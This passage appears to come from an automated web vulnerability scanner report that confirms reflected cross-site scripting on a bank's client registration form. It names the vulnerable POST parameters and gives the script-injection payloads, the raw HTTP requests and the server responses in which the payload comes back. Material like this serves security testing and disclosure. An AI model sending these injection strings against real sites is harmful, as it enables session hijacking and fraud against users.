&lt;option value=&apos;GTXX&apos; &gt;&amp;nbsp;GTXX&lt;/option&gt;
&lt;option value=&apos;HJH768&apos; &gt;&amp;nbsp;HJH768&lt;/option&gt;
&lt;option value=&apos;HKJBXF&apos; &gt;&amp;nbsp;HKJBXF&lt;/option&gt;
&lt;option value=&apos;HRAPX&apos; &gt;&amp;nbsp;HRAPX&lt;/option&gt;
&lt;option value=&apos;HUSK&apos; &gt;&amp;nbsp;HUSK&lt;/option&gt;
&lt;option value=&apos;IDTX&apos; &gt;&amp;nbsp;IDTX&lt;/option&gt;
&lt;option value=&apos;IDTX1&apos; &gt;&amp;nbsp;IDTX1&lt;/option&gt;
&lt;option value=&apos;IDTX2&apos; &gt;&amp;nbsp;IDTX2&lt;/option&gt;
&lt;option value=&apos;IDTX3&apos; &gt;&amp;nbsp;IDTX3&lt;/option&gt;
&lt;option value=&apos;INHH&apos; &gt;&amp;nbsp;INHH&lt;/option&gt;
&lt;option value=&apos;ITASCA&apos; &gt;&amp;nbsp;ITASCA&lt;/option&gt;
&lt;option value=&apos;JDCFX&apos; &gt;&amp;nbsp;JDCFX&lt;/option&gt;
&lt;option value=&apos;JLS&apos; &gt;&amp;nbsp;JLS&lt;/option&gt;
&lt;option value=&apos;JSDM&apos; &gt;&amp;nbsp;JSDM&lt;/option&gt;
&lt;option value=&apos;KRCM1&apos; &gt;&amp;nbsp;KRCM1&lt;/option&gt;
&lt;option value=&apos;KRCM2&apos; &gt;&amp;nbsp;KRCM2&lt;/option&gt;
&lt;option value=&apos;LBMFX&apos; &gt;&amp;nbsp;LBMFX&lt;/option&gt;
&lt;option value=&apos;LBXX2&apos; &gt;&amp;nbsp;LBXX2&lt;/option&gt;
&lt;option value=&apos;LMXX&apos; &gt;&amp;nbsp;LMXX&lt;/option&gt;
&lt;option value=&apos;LivIn&apos; &gt;&amp;nbsp;LivIn&lt;/option&gt;
&lt;option value=&apos;MASI&apos; &gt;&amp;nbsp;MASI&lt;/option&gt;
&lt;option value=&apos;MBCM&apos; &gt;&amp;nbsp;MBCM&lt;/option&gt;
&lt;option value=&apos;MBCO&apos; &gt;&amp;nbsp;MBCO&lt;/option&gt;
&lt;option value=&apos;MDLV&apos; &gt;&amp;nbsp;MDLV&lt;/option&gt;
&lt;option value=&apos;MEIDAO&apos; &gt;&amp;nbsp;MEIDAO&lt;/option&gt;
&lt;option value=&apos;NK71&apos; &gt;&amp;nbsp;NK71&lt;/option&gt;
&lt;option value=&apos;NKHFX&apos; &gt;&amp;nbsp;NKHFX&lt;/option&gt;
&lt;option value=&apos;OANFx5&apos; &gt;&amp;nbsp;OANFx5&lt;/option&gt;
&lt;option value=&apos;OANFx55&apos; &gt;&amp;nbsp;OANFx55&lt;/option&gt;
&lt;option value=&apos;OGFX&apos; &gt;&amp;nbsp;OGFX&lt;/option&gt;
&lt;option value=&apos;PAXX&apos; &gt;&amp;nbsp;PAXX&lt;/option&gt;
&lt;option value=&apos;PORFX&apos; &gt;&amp;nbsp;PORFX&lt;/option&gt;
&lt;option value=&apos;PRSP&apos; &gt;&amp;nbsp;PRSP&lt;/option&gt;
&lt;option value=&apos;PURK1&apos; &gt;&amp;nbsp;PURK1&lt;/option&gt;
&lt;option value=&apos;RGCSR&apos; &gt;&amp;nbsp;RGCSR&lt;/option&gt;
&lt;option value=&apos;RJPFX&apos; &gt;&amp;nbsp;RJPFX&lt;/option&gt;
&lt;option value=&apos;RMJ&apos; &gt;&amp;nbsp;RMJ&lt;/option&gt;
&lt;option value=&apos;RNKFX&apos; &gt;&amp;nbsp;RNKFX&lt;/option&gt;
&lt;option value=&apos;ROXX&apos; &gt;&amp;nbsp;ROXX&lt;/option&gt;
&lt;option value=&apos;RSFX&apos; &gt;&amp;nbsp;RSFX&lt;/option&gt;
&lt;option value=&apos;RUSLION&apos; &gt;&amp;nbsp;RUSLION&lt;/option&gt;
&lt;option value=&apos;Rio2016&apos; &gt;&amp;nbsp;Rio2016&lt;/option&gt;
&lt;option value=&apos;SARK&apos; &gt;&amp;nbsp;SARK&lt;/option&gt;
&lt;option value=&apos;SEP1&apos; &gt;&amp;nbsp;SEP1&lt;/option&gt;
&lt;option value=&apos;SKUSN&apos; &gt;&amp;nbsp;SKUSN&lt;/option&gt;
&lt;option value=&apos;SMXX&apos; &gt;&amp;nbsp;SMXX&lt;/option&gt;
&lt;option value=&apos;SOUK&apos; &gt;&amp;nbsp;SOUK&lt;/option&gt;
&lt;option value=&apos;SRVFX&apos; &gt;&amp;nbsp;SRVFX&lt;/option&gt;
&lt;option value=&apos;STAC&apos; &gt;&amp;nbsp;STAC&lt;/option&gt;
&lt;option value=&apos;STAR+&apos; &gt;&amp;nbsp;STAR+&lt;/option&gt;
&lt;option value=&apos;SVTL&apos; &gt;&amp;nbsp;SVTL&lt;/option&gt;
&lt;option value=&apos;TC4ET&apos; &gt;&amp;nbsp;TC4ET&lt;/option&gt;
&lt;option value=&apos;TFGINC&apos; &gt;&amp;nbsp;TFGINC&lt;/option&gt;
&lt;option value=&apos;VASCON1&apos; &gt;&amp;nbsp;VASCON1&lt;/option&gt;
&lt;option value=&apos;VASCON2&apos; &gt;&amp;nbsp;VASCON2&lt;/option&gt;
&lt;option value=&apos;VASCON3&apos; &gt;&amp;nbsp;VASCON3&lt;/option&gt;
&lt;option value=&apos;VFGL5112&apos; &gt;&amp;nbsp;VFGL5112&lt;/option&gt;
&lt;option value=&apos;VHGLNM678&apos; &gt;&amp;nbsp;VHGLNM678&lt;/option&gt;
&lt;option value=&apos;VKCS52&apos; &gt;&amp;nbsp;VKCS52&lt;/option&gt;
&lt;option value=&apos;VNG409CG&apos; &gt;&amp;nbsp;VNG409CG&lt;/option&gt;
&lt;option value=&apos;Vulov10&apos; &gt;&amp;nbsp;Vulov10&lt;/option&gt;
&lt;option value=&apos;W2WFX&apos; &gt;&amp;nbsp;W2WFX&lt;/option&gt;
&lt;option value=&apos;WDFX&apos; &gt;&amp;nbsp;WDFX&lt;/option&gt;
&lt;option value=&apos;WDFX2&apos; &gt;&amp;nbsp;WDFX2&lt;/option&gt;
&lt;option value=&apos;WDXX&apos; &gt;&amp;nbsp;WDXX&lt;/option&gt;
&lt;option value=&apos;XYWFX&apos; &gt;&amp;nbsp;XYWFX&lt;/option&gt;
  
            &lt;/select&gt;&lt;br&gt;
			&lt;p&gt;&lt;input type=&quot;checkbox&quot; name=&quot;aData[extManAnswer]&quot; value=&quot;Yes&quot; id=extManContact0&gt;&lt;label for=extManContact0&gt; - &lt;b&gt;I expressly confirm that the selection/appointment of the External Manager is my own initiative without any recommendation from Dukascopy Bank SA. I have proceeded to a due diligence on the External Manager and will keep Dukascopy Bank SA harmless and fully indemnified against any and all losses, direct and indirect damages whether financial or not, resulting from my External Manager&amp;#039;s acts or omissions.&lt;/b&gt;&lt;/label&gt;
			&lt;/p&gt;&lt;br&gt;
          &lt;/td&gt;
        &lt;/tr&gt;

        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;200&quot; id=&quot;radio_accountKind_200&quot; checked onClick=&quot;fSetServProviderMode(true);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_200&quot;&gt;Service Provider&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
        &lt;td&gt;&lt;/td&gt;
          &lt;td valign=&quot;top&quot; id=&quot;sel_servProvider&quot; &gt;
			          
            &lt;b&gt;Whilst selecting your Service Provider and for convenience purposes only you may use the pull-down menu. Dukascopy has not performed any competence verification or due diligence, does not issue any recommendation concerning your Service Provider and can not be held liable for any losses, direct and indirect damages whether financial or not, resulting from your Service Provider&amp;#039;s acts or omissions.&lt;/b&gt;&lt;br&gt;
            &lt;select name=&quot;aData[serviceProvider]&quot; id=&quot;sel_mas2&quot;&gt;
		      &lt;option value=&apos;BBAC47&apos; &gt;&amp;nbsp;BBAC47&lt;/option&gt;
&lt;option value=&apos;BUSH1&apos; &gt;&amp;nbsp;BUSH1&lt;/option&gt;
&lt;option value=&apos;BUSH2&apos; &gt;&amp;nbsp;BUSH2&lt;/option&gt;
&lt;option value=&apos;GNM87FV&apos; &gt;&amp;nbsp;GNM87FV&lt;/option&gt;
&lt;option value=&apos;KRC1&apos; &gt;&amp;nbsp;KRC1&lt;/option&gt;
&lt;option value=&apos;KRC2&apos; &gt;&amp;nbsp;KRC2&lt;/option&gt;
&lt;option value=&apos;KRC3&apos; &gt;&amp;nbsp;KRC3&lt;/option&gt;
&lt;option value=&apos;TINL&apos; &gt;&amp;nbsp;TINL&lt;/option&gt;
&lt;option value=&apos;ZUXX&apos; &gt;&amp;nbsp;ZUXX&lt;/option&gt;
  
            &lt;/select&gt;&lt;br&gt;
			&lt;p&gt;&lt;input type=&quot;checkbox&quot; name=&quot;aData[servProviderAnswer]&quot; value=&quot;Yes&quot; id=servProvider0&gt;&lt;label for=servProvider0&gt; - &lt;b&gt;I expressly confirm that the selection/appointment of the Service Provider is my own initiative without any recommendation from Dukascopy Bank SA. I have proceeded to a due diligence on the Service Provider and will keep Dukascopy Bank SA harmless and fully indemnified against any and all losses, direct and indirect damages whether financial or not, resulting from my Service Provider&amp;#039;s acts or omissions. I hereby acknowledge and agree that Dukascopy Bank SA may communicate my UIN and e-mail address to the Service Provider.&lt;/b&gt;&lt;/label&gt;
			&lt;/p&gt;				
          &lt;/td&gt;
        &lt;/tr&gt;

      &lt;/table&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
     &lt;td colspan=&quot;2&quot; align=&quot;center&quot;&gt;
     &lt;div id=&quot;infoWTXX&quot;&gt;        
      &lt;/div&gt;
      &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;buttons&quot;&gt;
      &lt;input class=&quot;button&quot; type=&quot;submit&quot; name=&quot;next&quot; value=&quot;Submit&quot;&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;info&quot; style=&quot;padding:20 0 0 0;&quot;&gt;
  MINIMUM AMOUNT TO BE DEPOSITED&lt;br/&gt;TO OPEN A LIVE TRADING ACCOUNT IS 1 000 USD&lt;br/&gt;
(OR ITS EQUIVALENT IN OTHER CURRENCIES).&lt;br/&gt;
&lt;br/&gt;&lt;b&gt;Filling the application form, please use Latin letters only!&lt;/b&gt;&lt;br/&gt;
&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;
	&lt;/td&gt;
  &lt;/tr&gt;
&lt;input type=&quot;hidden&quot; name=&quot;aData[HTTP_REFERER]&quot; value=&quot;3&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;backFormMarker&quot; value=&quot;&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;currentFormMarker&quot; value=&quot;step1&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;nextFormMarker&quot; value=&quot;step2&quot;&gt;&lt;span style=display:none; id=hidHtmlConvert&gt;&lt;/span&gt;&lt;script&gt;
                function fFillFormField (oElement, value)    {
                    try {
                        switch(oElement.tagName) {
                            case &quot;TEXTAREA&quot;:
                            case &quot;TEXT&quot;:
                            	document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML = value; 
                            	oElement.value = document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML; 
								// oElement.value = value;
                            break;
                            case &quot;SELECT&quot;:
                                oElement.value = value;
                                bFound = false;
                                for (i=0; i&lt;oElement.options.length; i++)    {
                                    if(oElement.options[i].value == value)    {
                                        oElement.options[i].selected = true;
                                        bFound = true;
                                        break;
                                    }
                                }
                                if(value &amp;&amp; !bFound)    {
                                    oNew = document.createElement(&quot;OPTION&quot;);
                                    oNew.value = value;
                                    oNew.innerHTML = value;
                                    oElement.appendChild(oNew);
                                    oElement.lastChild.selected = true;
                                }
                            break;
                            default:
                                if(oElement.length)    {
                                    for(i=0;i&lt;oElement.length;i++)    {
                                        if(oElement[i].value == value)
                                            oElement[i].click();
                                        else
                                            oElement[i].checked = false;
                                    }
                                }
                                else {
                                    if(oElement.type == &quot;checkbox&quot;)
                                        oElement.click();
                                    else {
		                            	document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML = value; 
		                            	oElement.value = document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML; 
                                    //  oElement.value = value;
                                        }
                                }
                            break;
                        }
                        try    {
                            oElement.fireEvent(&quot;onchange&quot;);
                        }
                        catch(e) {
                            try {
                                var evt = document.createEvent(&quot;HTMLEvents&quot;);
                                evt.initEvent(&quot;change&quot;,true,true);
                                oElement.dispatchEvent( evt );
                            }
                            catch(e){}
                        }
                    }
                    catch(e){}
                }
                function fFillForm()    {
fFillFormField(document.mainForm[&quot;aData[STRAT_REF]&quot;], &quot;-1&quot;);
fFillFormField(document.mainForm[&quot;aData[FEEDBACK_URL]&quot;], &quot;-1&quot;);
fFillFormField(document.mainForm[&quot;aData[TYPE]&quot;], &quot;2&quot;);
fFillFormField(document.mainForm[&quot;aData[accountKind]&quot;], &quot;200&quot;);
fFillFormField(document.mainForm[&quot;aData[serviceProvider]&quot;], &quot;BBAC47&quot;);
fFillFormField(document.mainForm[&quot;aData[servProviderAnswer]&quot;], &quot;\&apos;\&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x0001A7)&lt;/script&gt;&quot;);}&lt;/script&gt;&lt;/form&gt;
&lt;/table&gt;
&lt;img id=&quot;progress_img&quot; src=&quot;../../images/progress_bar.gif&quot; width=&quot;69&quot; height=&quot;17&quot; border=&quot;0&quot; style=&quot;display:none;&quot;&gt;
  &lt;/body&gt;
&lt;/html&gt;
 ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A2</OWASP>
            <WASC>08</WASC>
            <CWE>79</CWE>
            <CAPEC>19</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>https://live-login.dukascopy.com/fo/register/live/index.php</url>
		<type>XSS</type>
		<severity>Important</severity>
		
		<vulnerableparametertype>Post</vulnerableparametertype>
		<vulnerableparameter>currentFormMarker</vulnerableparameter>
		<vulnerableparametervalue>&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x00023F)&lt;/script&gt;</vulnerableparametervalue>

		<rawrequest><![CDATA[POST /fo/register/live/index.php HTTP/1.1
Referer: https://live-login.dukascopy.com/fo/register/live/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: live-login.dukascopy.com
Content-Length: 261
Accept-Encoding: gzip, deflate

aData%5BSTRAT_REF%5D=-1&amp;aData%5BFEEDBACK_URL%5D=-1&amp;aData%5BTYPE%5D=1&amp;aData%5BaccountKind%5D=3&amp;aData%5BHTTP_REFERER%5D=3&amp;backFormMarker=3&amp;currentFormMarker=&apos;%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00023F)%3c%2fscript%3e&amp;nextFormMarker=step2
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 200 OK
Date: Thu, 17 Mar 2011 19:26:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.3.3
Transfer-Encoding: chunked
Content-Type: text/html; charset=windows-1252



&lt;html lang=&quot;en&quot;&gt;
  &lt;head&gt;
    &lt;title&gt;Client Registration&lt;/title&gt;
    &lt;META http-equiv=Content-Type content=&quot;text/html; charset=windows-1252&quot;&gt;
    &lt;script&gt;
      function init()  {
        fFillForm();
      }

      var bShowWaiting = true;

      function showWaiting()  {
        if(bShowWaiting)  {
          for (odj in document.body.childNodes)
            try  {
	            document.body.childNodes[odj].style.display = &apos;none&apos;;
	          }catch(e){}

	        oProgressDiv = document.createElement(&apos;div&apos;);
	        document.body.appendChild(oProgressDiv);
	        oProgressDiv.align = &apos;center&apos;;
	        oProgressDiv.innerHTML = &quot;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;Please, wait&lt;br/&gt;&quot;;

	        tmp = document.getElementById(&apos;progress_img&apos;)
	        oProgressImg = tmp.cloneNode(false);
	        oProgressImg.style.display = &apos;block&apos;;
	        oProgressDiv.appendChild(oProgressImg);
	        bShowWaiting = false;
	      }
      }

    function addEventHandler(obj, type, func, useCapture) {
        if (obj.addEventListener) {
            obj.addEventListener(type, func, useCapture);
            return true;
        }
        else if (obj.attachEvent) {
            var r = obj.attachEvent(&apos;on&apos; + type, func);
            return r;
    	}
        else {
            obj[&apos;on&apos; + type] = func;
        }
    }

    tipIndex = 0;
    function drawTip (sTip, width) {
        this.hideDelay = 600;
        this.sTip = sTip;
        this.hideTimeoutId = null;
        var oThis = this;

        this.show = function (event) {
            var oEvent = (event || window.event);
            if (oThis.hideTimeoutId) {
                window.clearTimeout(oThis.hideTimeoutId);
                return;
            } else if (oThis.oTipContainer.style.display == &quot;block&quot;) {
                return;
            }
            aSelects = document.getElementsByTagName(&apos;SELECT&apos;);
            for (i=0; i &lt; aSelects.length; i++)  {
                aSelects[i].style.visibility = &apos;hidden&apos;;
            }
            oThis.oTipContainer.style.top = oEvent.clientY - oThis.oTipContainer.offsetHeight - 2;
            oThis.oTipContainer.style.left = oEvent.clientX + 3;
            oThis.oTipContainer.style.display = &quot;block&quot;;
        }

        this.hide = function () {
            oThis.hideTimeoutId = null;
            oThis.oTipContainer.style.display = &quot;none&quot;;
            aSelects = document.getElementsByTagName(&apos;SELECT&apos;);
            for (i=0; i &lt; aSelects.length; i++)  {
                aSelects[i].style.visibility = &apos;&apos;;
            }
        }

        this.hideTimeouted = function () {
            oThis.hideTimeoutId = window.setTimeout(oThis.hide, oThis.hideDelay);
        }

        document.write(&apos;&lt;img src=&quot;../../images/icons/16x16/tip.png&quot; align=&quot;absmiddle&quot; height=&quot;16&quot; width=&quot;16&quot; border=&quot;0&quot; id=&quot;tipImg&apos; + tipIndex + &apos;&quot;/&gt;&apos;);
        document.write(&apos;&lt;div class=&quot;tip&quot; style=&quot;display:none;&quot; id=&quot;tipContainer&apos; + tipIndex + &apos;&quot;&gt;&apos; + sTip + &apos;&lt;/div&gt;&apos;);

        this.oTipImg = document.getElementById(&apos;tipImg&apos; + tipIndex);
        this.oTipContainer = document.getElementById(&apos;tipContainer&apos; + tipIndex);
        if (typeof(width) != &apos;undefined&apos;)
            this.oTipContainer.style.width = width;
        addEventHandler(this.oTipImg, &apos;mouseover&apos;, this.show);
        addEventHandler(this.oTipContainer, &apos;mouseover&apos;, this.show);
        addEventHandler(this.oTipImg, &apos;mouseout&apos;, this.hideTimeouted);
        addEventHandler(this.oTipContainer, &apos;mouseout&apos;, this.hideTimeouted);
        tipIndex++;
    }
    &lt;/script&gt;
    &lt;!--&lt;script src=&quot;js/lib.js&quot;&gt;&lt;/script&gt;
    &lt;script src=&quot;js/checkForm.js&quot;&gt;&lt;/script&gt;--&gt;
  &lt;style&gt;
  body, td, span, div, p, tr, th, option, font, button, input, select, textarea, b, i, a {
    font-size:8pt;
    font-family:Verdana;
  }
  table  {
   table-layout:fixed;
  }
  a  {
    font-weight:bold;
    text-decoration:underline;
    color:black;
  }

  a:hover  {
    color:#666666;
  }

  .header  {
    font-size:11pt;
    height:24px;
    color:#FFFFFF;
    font-weight:bold;
    text-align:center;
    background-image: url(&apos;https://www.dukascopy.com/swiss/inc/images/headline_bg_menu.gif&apos;);
    background-color:#000;
    background-position:0px 0px;
    background-repeat:repeat-x;
  }

  .header a  {
    color:#FFFFFF;
    font-weight:bold;
    text-decoration:none;
  }

  .header a:hover  {
    color:#FFFFFF;
    text-decoration:underline;
  }

  .subheader  {
    font-size:10pt;
    color:#333333;
    font-weight:bold;
    text-align:center;
    padding:5 0 0 0;
  }

 .subheader *  {
    font-size:10pt;
    font-weight:bold;
  }

  .step  {
    font-size:10pt;
    color:#999999;
    font-weight:bold;
    text-align:center;
    padding:5 0 5 0;
  }
  .error  {
    font-size:10pt;
    color:#EE0000;
    text-align:center;
    padding:5 0 5 0;
    font-weight:bold;
  }
  .title  {
    text-align:right;
    width:50%;
    padding:2 2 2 2;
    color:#1D4470;
  }
  .field  {
    text-align:left;
    width:50%;
    padding:2 22 2 2;
  }
  .buttons  {
    text-align:center;
    padding:4 4 4 4;
  }
  .button  {
    color:white;
    border:1px outset;
    cursor:pointer;
    background-color:#1D4470;
    width:100px;
    font-weight:bold;
    height:13pt;
  }
  .info  {
    text-align:center;
    padding-left:22;
    padding-right:22;
  }
  input.text  {
    width:100%;
    border-top:1px solid #cccccc;
    border-right:1px solid #cccccc;
    border-bottom:1px solid #cccccc;
    border-left:1px solid #cccccc;
  }
  input.checkbox {

  }
  textarea  {
    width:100%;
    border:1px solid #cccccc;
    font-size:8pt !important;
    font-weight:normal !important;
  }
  select {
    border:1px solid #cccccc;
  }

  .tip {
    position:absolute;
    border: 1px solid #333333;
    background-color: #FFFFE1;
    width: 250px;
    padding: 7px;
    text-align: justify;
    z-index:100;
  }

  &lt;/style&gt;
  &lt;/head&gt;
  &lt;body onLoad=&quot;init();&quot; onBeforeUnload=&quot;showWaiting();&quot; style=&quot;margin:0px;padding:0px;&quot;&gt;
  &lt;div style=&quot;background:url(&apos;https://www.dukascopy.com/pics/topBackground.png&apos;) repeat-x;&quot;&gt;&lt;img src=&quot;https://www.dukascopy.com/pics/headers/website_logo_bank.jpg&quot; alt=&quot;Dukascopy&quot; style=&quot;width:579px;height:103px;border:none;&quot;&gt;&lt;/div&gt;
  &lt;table width=&quot;100%&quot; align=&quot;center&quot; border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt;
&lt;form style=&quot;margin:0px;padding:0px;&quot; name=&quot;mainForm&quot; action=&quot;/fo/register/live/index.php&quot; method=&quot;post&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[STRAT_REF]&quot; value=&quot;-1&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[FEEDBACK_URL]&quot; value=&quot;-1&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[TYPE]&quot; value=&quot;1&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[accountKind]&quot; value=&quot;3&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[HTTP_REFERER]&quot; value=&quot;3&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;backFormMarker&quot; value=&quot;&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;currentFormMarker&quot; value=&quot;&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x00023F)&lt;/script&gt;&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;nextFormMarker&quot; value=&quot;&quot;&gt;&lt;span style=display:none; id=hidHtmlConvert&gt;&lt;/span&gt;&lt;script&gt;
                function fFillFormField (oElement, value)    {
                    try {
                        switch(oElement.tagName) {
                            case &quot;TEXTAREA&quot;:
                            case &quot;TEXT&quot;:
                            	document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML = value; 
                            	oElement.value = document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML; 
								// oElement.value = value;
                            break;
                            case &quot;SELECT&quot;:
                                oElement.value = value;
                                bFound = false;
                                for (i=0; i&lt;oElement.options.length; i++)    {
                                    if(oElement.options[i].value == value)    {
                                        oElement.options[i].selected = true;
                                        bFound = true;
                                        break;
                                    }
                                }
                                if(value &amp;&amp; !bFound)    {
                                    oNew = document.createElement(&quot;OPTION&quot;);
                                    oNew.value = value;
                                    oNew.innerHTML = value;
                                    oElement.appendChild(oNew);
                                    oElement.lastChild.selected = true;
                                }
                            break;
                            default:
                                if(oElement.length)    {
                                    for(i=0;i&lt;oElement.length;i++)    {
                                        if(oElement[i].value == value)
                                            oElement[i].click();
                                        else
                                            oElement[i].checked = false;
                                    }
                                }
                                else {
                                    if(oElement.type == &quot;checkbox&quot;)
                                        oElement.click();
                                    else {
		                            	document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML = value; 
		                            	oElement.value = document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML; 
                                    //  oElement.value = value;
                                        }
                                }
                            break;
                        }
                        try    {
                            oElement.fireEvent(&quot;onchange&quot;);
                        }
                        catch(e) {
                            try {
                                var evt = document.createEvent(&quot;HTMLEvents&quot;);
                                evt.initEvent(&quot;change&quot;,true,true);
                                oElement.dispatchEvent( evt );
                            }
                            catch(e){}
                        }
                    }
                    catch(e){}
                }
                function fFillForm()    {}&lt;/script&gt;&lt;/form&gt;
&lt;/table&gt;
&lt;img id=&quot;progress_img&quot; src=&quot;../../images/progress_bar.gif&quot; width=&quot;69&quot; height=&quot;17&quot; border=&quot;0&quot; style=&quot;display:none;&quot;&gt;
  &lt;/body&gt;
&lt;/html&gt;
 ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A2</OWASP>
            <WASC>08</WASC>
            <CWE>79</CWE>
            <CAPEC>19</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>https://live-login.dukascopy.com/fo/register/live/index.php</url>
		<type>XSS</type>
		<severity>Important</severity>
		
		<vulnerableparametertype>Post</vulnerableparametertype>
		<vulnerableparameter>currentFormMarker</vulnerableparameter>
		<vulnerableparametervalue>&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x0002A6)&lt;/script&gt;</vulnerableparametervalue>

		<rawrequest><![CDATA[POST /fo/register/live/index.php HTTP/1.1
Referer: https://live-login.dukascopy.com/fo/register/live/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: live-login.dukascopy.com
Content-Length: 297
Accept-Encoding: gzip, deflate

aData%5BSTRAT_REF%5D=-1&amp;aData%5BFEEDBACK_URL%5D=-1&amp;aData%5BTYPE%5D=2&amp;aData%5BaccountKind%5D=200&amp;aData%5BservProviderAnswer%5D=Yes&amp;aData%5BHTTP_REFERER%5D=3&amp;backFormMarker=3&amp;currentFormMarker=&apos;%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0002A6)%3c%2fscript%3e&amp;nextFormMarker=step2
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 200 OK
Date: Thu, 17 Mar 2011 19:26:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.3.3
Transfer-Encoding: chunked
Content-Type: text/html; charset=windows-1252



&lt;html lang=&quot;en&quot;&gt;
  &lt;head&gt;
    &lt;title&gt;Client Registration&lt;/title&gt;
    &lt;META http-equiv=Content-Type content=&quot;text/html; charset=windows-1252&quot;&gt;
    &lt;script&gt;
      function init()  {
        fFillForm();
      }

      var bShowWaiting = true;

      function showWaiting()  {
        if(bShowWaiting)  {
          for (odj in document.body.childNodes)
            try  {
	            document.body.childNodes[odj].style.display = &apos;none&apos;;
	          }catch(e){}

	        oProgressDiv = document.createElement(&apos;div&apos;);
	        document.body.appendChild(oProgressDiv);
	        oProgressDiv.align = &apos;center&apos;;
	        oProgressDiv.innerHTML = &quot;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;Please, wait&lt;br/&gt;&quot;;

	        tmp = document.getElementById(&apos;progress_img&apos;)
	        oProgressImg = tmp.cloneNode(false);
	        oProgressImg.style.display = &apos;block&apos;;
	        oProgressDiv.appendChild(oProgressImg);
	        bShowWaiting = false;
	      }
      }

    function addEventHandler(obj, type, func, useCapture) {
        if (obj.addEventListener) {
            obj.addEventListener(type, func, useCapture);
            return true;
        }
        else if (obj.attachEvent) {
            var r = obj.attachEvent(&apos;on&apos; + type, func);
            return r;
    	}
        else {
            obj[&apos;on&apos; + type] = func;
        }
    }

    tipIndex = 0;
    function drawTip (sTip, width) {
        this.hideDelay = 600;
        this.sTip = sTip;
        this.hideTimeoutId = null;
        var oThis = this;

        this.show = function (event) {
            var oEvent = (event || window.event);
            if (oThis.hideTimeoutId) {
                window.clearTimeout(oThis.hideTimeoutId);
                return;
            } else if (oThis.oTipContainer.style.display == &quot;block&quot;) {
                return;
            }
            aSelects = document.getElementsByTagName(&apos;SELECT&apos;);
            for (i=0; i &lt; aSelects.length; i++)  {
                aSelects[i].style.visibility = &apos;hidden&apos;;
            }
            oThis.oTipContainer.style.top = oEvent.clientY - oThis.oTipContainer.offsetHeight - 2;
            oThis.oTipContainer.style.left = oEvent.clientX + 3;
            oThis.oTipContainer.style.display = &quot;block&quot;;
        }

        this.hide = function () {
            oThis.hideTimeoutId = null;
            oThis.oTipContainer.style.display = &quot;none&quot;;
            aSelects = document.getElementsByTagName(&apos;SELECT&apos;);
            for (i=0; i &lt; aSelects.length; i++)  {
                aSelects[i].style.visibility = &apos;&apos;;
            }
        }

        this.hideTimeouted = function () {
            oThis.hideTimeoutId = window.setTimeout(oThis.hide, oThis.hideDelay);
        }

        document.write(&apos;&lt;img src=&quot;../../images/icons/16x16/tip.png&quot; align=&quot;absmiddle&quot; height=&quot;16&quot; width=&quot;16&quot; border=&quot;0&quot; id=&quot;tipImg&apos; + tipIndex + &apos;&quot;/&gt;&apos;);
